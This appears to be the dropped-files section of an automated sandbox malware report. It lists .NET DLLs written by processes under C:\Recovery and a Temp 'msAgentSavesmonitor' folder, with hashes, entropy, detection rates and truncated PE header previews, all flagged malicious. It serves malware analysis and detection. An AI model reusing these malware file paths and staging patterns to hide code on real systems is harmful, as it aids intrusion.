                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):5.645950918301459
                                                                  Encrypted:false
                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):5.645950918301459
                                                                  Encrypted:false
                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
